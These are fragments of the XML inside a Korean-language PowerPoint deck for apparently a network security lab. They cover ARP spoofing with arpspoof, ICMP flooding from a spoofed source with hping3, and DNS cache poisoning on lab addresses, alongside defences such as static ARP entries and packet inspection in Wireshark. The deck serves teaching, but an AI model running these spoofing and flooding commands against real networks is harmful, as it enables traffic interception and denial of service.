              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>내부 사용자의 주소만 재귀 쿼리를 허용한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="235354293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Network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592714182"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3290207" y="2813240"/>
          <a:ext cx="4612822" cy="1970405"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1842745">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2798934004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2770077">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WSLOfflinePackageInstall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오프라인</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패키지 설치 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>(bgpdump)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6320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0"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featurename:Microsoft-Windows-Subsystem-Linux</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featurename:VirtualMachinePlatform</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32479215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5"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6"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7"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SYN Flooding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8"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9"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10"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11"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전송되는 모든 패킷들이 공격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(10.10.1.166)</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전송되도록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9368900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서버에서 공격 서버를 게이트웨이로 인식하도록 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ARP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>스푸핑</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 공격을 주기적으로 수행</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>arpspoof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> –t 10.10.1.101(Target IP) 10.10.1.1(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>호스트 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>IP) &amp;(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>백그라운드 실행</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>    # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>arpspoof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> –t 10.10.1.101 10.10.1.1 &amp;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Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 사용하여 실습 서버에서 게이트웨이로 전송한 패킷들이 공격 서버로 전송되는 것을 확인</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72040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 확인을 위해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>명령으로 공격서버에 접속하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>주소를 확인해보면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>주소가 변조 되었다는 것을 알 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="100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197191872">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E890E658-F2C6-4221-91E8-AB712CD86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1109133"/>
            <a:ext cx="54006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197185712">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55727A18-6557-42E6-83B7-798CFCA9A6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07"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="500180" y="3043882"/>
            <a:ext cx="5400675" cy="3323052"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1029" name="_x197186512">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3269E7C-7B5F-4F72-9E70-359283297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5" y="871008"/>
            <a:ext cx="5400675" cy="304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A4E4ED3-BDCA-4D45-97D1-5F6CDD960B13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183088" y="4291914"/>
            <a:ext cx="5616792" cy="2197084"/>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031" name="_x197192112">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{900F0CEB-751B-4FFF-A4C1-6BCBFA25F5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4898652"/>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19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 y="221103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2049" name="_x197187632">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B06D8ADC-3A95-4866-A761-646AF88742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63600"/>
            <a:ext cx="5400675" cy="70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07661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와의 통신을 위해</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캐시에 정적으로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DF88C7B9-9BAF-4477-A2F0-B4FB8C5AB8D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19415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Wireshark </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실행</a:t>
            </a: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a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 패킷 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>* 지속적으로 잘못된 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>MAC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>주소가 담긴 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ARP Reply Packet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>을 보내 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ARP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>캐시를 조작하게 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203553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arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> -s 10.10.1.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>aa:bb:cc:dd:ee:ff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> (MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>주소</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"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a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>4.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>정적으로 설정이 되어 있는지 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> -a</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197193632">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D830F87-2103-47B3-A625-23A5DDE0E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47710"/>
            <a:ext cx="5400675" cy="268128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197187392">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22CF92EE-012E-4DA5-8390-7E25C8A8F5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957"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="500180" y="4286660"/>
            <a:ext cx="5400675" cy="2088740"/>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197193552">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5BACF93-B2D1-4B2B-BE76-266053177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134" y="747710"/>
            <a:ext cx="4198938" cy="182563"/>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197193632">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47162951-6D3E-485B-92B5-3D5A0E55B3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6134" y="1786467"/>
            <a:ext cx="4297363" cy="4270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6B17F8-913C-4664-A837-ED28F8D00748}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183088" y="2543623"/>
            <a:ext cx="5616792" cy="394537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p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3081" name="_x197185712">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94E486C6-C272-413D-B244-829BC82EB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0275" y="3009898"/>
            <a:ext cx="3222625"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6492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서버를 대상으로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192.168.99.11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데이터 크기를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9127791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서버를 대상으로 데이터 크기가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>100 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>바이트인 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패킷을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>플러딩</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>    # hping3 –a 192.168.99.11 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> –d 100 10.10.1.101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Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>192.168.99.11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 패킷이 나가는지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197186992">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67F798C4-9547-4C81-837C-47E9F3021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43233"/>
            <a:ext cx="54006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197192032">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4955B429-37DD-42D9-9F37-B585ADCC3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84" y="2431868"/>
            <a:ext cx="5400675" cy="23209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36A681B-7B62-4DF6-B54B-133E044543EF}"/>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4" name="_x197192112">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A25F164B-9269-498B-B06F-55D47B03D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3524" y="943233"/>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0171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25844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5121" name="_x197188192">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8FCA90A-682C-45B5-9784-F4332E2470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80" y="934995"/>
            <a:ext cx="5400675" cy="904875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="화살표: 오른쪽 12">
            <a:hlinkClick r:id="rId7" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D22CAD37-D98B-4716-8D1A-B5AD6A94AFCE}"/>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9323579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공격자가 현재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FD9CA133-CDC3-42B0-8A32-4B3B8D6A50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3488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err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실행</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err="1"/>
              <a:t>icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> Request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패킷에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>주소 확인</a:t>
            </a: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3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rsyslog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서비스 재시작</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>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197190112">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C635AA4A-42BE-4713-8D61-6772DBCDB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9622"/>
            <a:ext cx="5400675" cy="36433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197190192">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B2A8B92-7AFA-4DAF-80B5-1C187FC17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679622"/>
            <a:ext cx="5400675" cy="3698875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6149" name="_x197189472">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4338795-C9B2-4338-8BED-76AA97A87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4984484"/>
            <a:ext cx="5295900" cy="44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55728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956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실시간으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>되는 패킷을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># tail –f /var/log/message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197190032">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AA0C41A-5B19-4DF4-BF64-A7218AEDD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10281"/>
            <a:ext cx="3573463" cy="160338"/>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197188592">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2408CFBA-BA48-420E-8CFA-FB6F9E82C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80" y="1135933"/>
            <a:ext cx="5400675" cy="4418013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7173" name="_x197191152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17DFA826-4DDC-45BE-9B15-1CCB6D342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757" y="933300"/>
            <a:ext cx="53260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7175" name="_x197191152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3A566C9-EA6C-4436-9FD6-CCE738E6B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2023533"/>
            <a:ext cx="5400675" cy="30257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30512B-1FD6-4022-AA7E-A2FEDB1B8E20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183088" y="5303756"/>
            <a:ext cx="5616792" cy="1185241"/>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endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7177" name="_x197191792">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1A45113-677B-4426-9605-56BCF540D8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757" y="5575184"/>
            <a:ext cx="3246438" cy="42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3719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보인다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서버의 캐시를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오염시키시오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도메인에 대한 네임 서버를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79584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패킷 캡처 도구인 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실행 및 패킷 캡처 시작</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Application -&gt; 09 – Sniffing &amp; Spoofing -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>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eth0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DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버가 보내는 쿼리 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 확인하기 위하여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명령으로 일부 호스트의 주소 조회</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>  # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>nslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> www.navy.ac.kr 10.10.1.14 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    또는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># dig @10.10.1.14 www.navy.ac.kr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48552432">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98F2CEAC-A054-4028-9C6C-02F4767B1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146" y="926756"/>
            <a:ext cx="3411538" cy="2989263"/>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197189632">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{064748F7-B3EE-4002-BEEE-371CF25FDF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4" t="15539" r="-1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1350586" y="4333103"/>
            <a:ext cx="3699863" cy="2050098"/>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197190272">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23F48267-B84B-4D61-B29B-A4EF960150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52316"/>
          <a:stretch>
            <a:fillRect/>
